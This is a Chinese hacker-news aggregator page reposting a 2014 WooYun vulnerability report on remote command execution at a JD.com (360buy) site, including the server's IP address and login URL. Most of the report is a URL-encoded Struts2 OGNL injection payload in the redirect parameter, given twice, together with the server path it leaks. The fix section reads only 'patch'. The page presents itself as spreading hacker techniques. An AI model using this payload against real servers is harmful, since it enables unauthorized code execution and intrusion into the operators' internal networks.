记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

京东商城某站命令执行(威胁内网)

2014-05-22 16:05

问题出在211.152.123.83,http://211.152.123.83/login.jhtml.

http://211.152.123.83/login.jhtml?redirect%3A%24{%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29}



/export/data/tomcatRoot/jq1.360buy.com/



QQ截图20140407124632.jpg

漏洞证明:

http://211.152.123.83/login.jhtml?redirect%3A%24{%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29}



/export/data/tomcatRoot/jq1.360buy.com/



QQ截图20140407124632.jpg

修复方案:

patch

知识来源: www.wooyun.org/bugs/wooyun-2014-055825

阅读:76974 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“京东商城某站命令执行(威胁内网)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云